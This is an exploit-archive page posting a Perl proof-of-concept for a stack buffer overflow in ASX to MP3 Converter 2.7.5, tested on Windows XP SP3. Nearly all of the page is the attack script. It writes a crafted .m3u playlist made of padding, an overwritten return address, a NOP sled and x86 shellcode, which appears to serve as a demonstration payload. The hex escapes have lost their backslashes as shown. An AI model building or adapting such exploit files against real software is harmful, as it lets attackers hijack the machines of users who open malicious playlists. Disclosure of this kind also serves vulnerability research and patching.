Home / exploits Asx To MP3 2.7.5 Stack Buffer Overflow
Posted on 08 October 2014
########################################################################################### # Exploit Title: ASX to MP3 Converter 2.7.5 stack buffer overflow # Date: 6 Oct 2014 # Exploit Author: Amir Reza Tavakolian # Vendor Homepage: http://binarylife.blog.ir/ # Software Link: http://download.cnet.com/ASX-to-MP3-Converter/3000-2168_4-10385919.html # Version: 2.7.5 # Tested on: windows xp sp 3 # # # Special thanks to Mr Michael Czumak (T_v3rn1x) for his tutorial in securitysift.com. # Thanks Mike. :) ########################################################################################## #!/usr/bin/perl my $junk = "x41" x 35056; my $eip = pack ('V', 0x73e848a7); my $nop = "x90" x 4; my $shellcode = "x90" x 25; $shellcode = $shellcode . "x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42" . "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03" . "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b" . "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e" . "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c" . "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74" . "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe" . "x49x0bx31xc0x51x50xffxd7"; my $junk1 = "c" x 24806; my $total = $junk.$eip.$nop.$shellcode.$junk1; my $file = "poc1.m3u"; open (FILE, ">$file"); print FILE $total; close (FILE); print "Done.../";
